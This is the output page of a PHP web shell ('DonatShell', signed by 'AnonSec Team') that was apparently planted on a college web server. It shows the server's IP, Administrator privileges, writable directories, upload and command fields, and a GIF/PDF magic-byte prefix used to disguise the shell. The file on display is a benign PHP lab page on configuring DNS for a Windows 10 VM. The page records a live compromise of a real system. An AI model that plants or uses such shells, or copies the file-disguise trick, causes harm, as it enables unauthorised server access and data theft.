GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/JimMartinson/CST2608/Labs/Lab04.5/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/JimMartinson/CST2608/Labs/Lab04.5/Lab04.5.phpinc
<?
// JimMartinson/CST2608/Labs/Lab04/Lab04.phpinc

$js .= ',/JimMartinson/CST2608/Labs/Lab04/Lab04.js';
require('Gradebook/EvaluationSubmission_BEGIN.phpinc'); // Replaced.
require('JimMartinson/CST2608/Labs/StudentServerNameNAT.phpinc');

$disabled = '';
$disabled = ' disabled';

?>
<fieldset><legend>Description</legend>
The purpose of this lab is to configure your Windows 10 VM to use your Ubuntu server (<?=$Uservername?>.<?=$domain?>) for DNS.
<br>
	<span class="note normal">This lab is done on your Windows 10 VM.</span>
<br>
	<span class="note normal">DO NOT PERFORM THIS LAB UNTIL ALL PREVIOUS LABS HAVE BEEN PERFORMED!</span>
<?=$gradeNote?>
<? if ( $disabled ) { ?><span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><? } ?>
</fieldset>

<!--<fieldset><legend>Example:</legend>
View a recording of me performing Lab 4: <a href="CST1608_Lab04_DNS_Server.wrf">CST1608_Lab04_DNS_Server.wrf</a>
</fieldset>-->

<fieldset><legend>Lab Instruction</legend>
	Create a folder for this <?=strtolower($evaluationType)?> named <b><?=$evaluationName?></b> and keep all documents used for <?=$evaluationType?> <?=$evaluationNumber?> in that folder.
<ol id="main" class="count">
	<!-- 1 -->
	<li>Configure your Windows 10 VM to use your Ubuntu server for DNS.
	</li>
	<!-- 2 -->
	<? require('common/Browser/Browser.phpinc'); ?>
	<li>Verify your Windows 10 VM is using your server as it's primary DNS server.
  	<ol type="a">
			<li>Open a cmd window on your Windows 10 VM.</li>
			<li>Perform nslookup of the Ubuntu server with the command <kbd class="copyText">nslookup <?=$Uservername?>.<?=$domain?></kbd>.</li>
			<? $screenshot1 = $courseNumber.'-'.$evaluationName.'-nslookup-'.$userFileName.'.png'; ?>
			<li><b class="info">Take a screenshot</b> of the termainal window and save it as <b class="copyText" style="white-space:nowrap;"><?=$screenshot1?></b>.
				<? showBegin('See example nslookup'); ?><br><img src="images/nslookup.png" width="899" height="482" alt=""/><br><? showEnd(); ?>
			</li>
			<li>Open a browser and enter <samp class="copyText">https://cst.<?=$domain?></samp>.</li>
			<? $screenshot2 = $courseNumber.'-'.$evaluationName.'-ridgewater-'.$userFileName.'.png'; ?>
			<li><b class="info">Take a screenshot</b> of the browser window and save as <b class="copyText" style="white-space:nowrap;"><?=$screenshot2?></b>.
				<? showBegin('See example cst.'.$domain.' browser window'); BrowserBegin('Computer Systems Technology - Ridgewater College','https://cst.mar.test/',1022,463); ?> <img src="images/ridgewater.png" width="1000" height="403" alt=""/><? BrowserEnd(); /** / width is image+22 height is image+60  /**/ showEnd(); ?>
			</li>
    </ol>
  </li>
	<!-- 3 -->
	<li>Verify Webmin can manage your <b>BIND DNS server</b>.
		<ol>
			<li>Open a browser and open Webmin by going to <b class="copyText">https://<?=$Uservername?>.<?=$domain?>:10000</b>.</li>
			<li>Go to <b>Servers</b>/<b>BIND DNS Server</b> <span class="note">You may have to click the <img src="images/RefreshModules.png" width="119" height="18" alt="Refresh Modules"> link in the lower left for it to show up.</span></li>
			<li>Ensure that your <b>Existing DNS Zones</b> section is visible in the browser window.</li>
			<? $screenshot3 = $courseNumber.'-'.$evaluationName.'-Webmin-'.$userFileName.'.png'; ?>
			<li><b class="info">Take a screenshot</b> and save it as <b class="copyText" style="white-space:nowrap;"><?=$screenshot3?></b>.
				<? showBegin('See example Webmin browser window'); BrowserBegin('Webmin','https://jimmar18.mar.test:10000/bind8/?xnavigation=1',1022,587); ?> <img src="images/Webmin.png" width="1000" height="382" alt=""/><? BrowserEnd(); /** / width is image+22 height is image+60  /**/ showEnd(); ?>
			</li>
		</ol>
	</li>
	<!-- 4 -->
	<li>Turn in your assignment:
		<ol type="a">
			<li>Ensure the following files are in your <b><?=$evaluationName?></b> folder:<?
$fileList = array(
	$screenshot1,
	$screenshot2,
	$screenshot3,
);
	natcasesort($fileList);
						foreach ($fileList as $fileName) {
?>
				<br> &nbsp; <?=$fileName?>
<?
						}
?>
			</li>
			<li>Zip up your <b><?=$evaluationName?></b> directory into a file named <b class="copyText"><?=$uploadFilename?></b>.</li>
			<li>Browse and select your <b><?=$uploadFilename?></b> file: <input type="file" name="fileUpload" id="inpFileUpload"<?=$disabled?>><div id="divFileploadError"></div></li>
			<li>Then <input type="submit" name="f_subtask" id="inpSubmit" value="Submit"<?=$disabled?>> for grading.</li>
		</ol>
 </li>
</ol><? if ( $disabled ) { ?><span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><? } ?>
</fieldset>
<?
require('Gradebook/EvaluationSubmission_END.phpinc'); // Replaced.
if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol>\n";
?>

Anon7 - 2022
AnonSec Team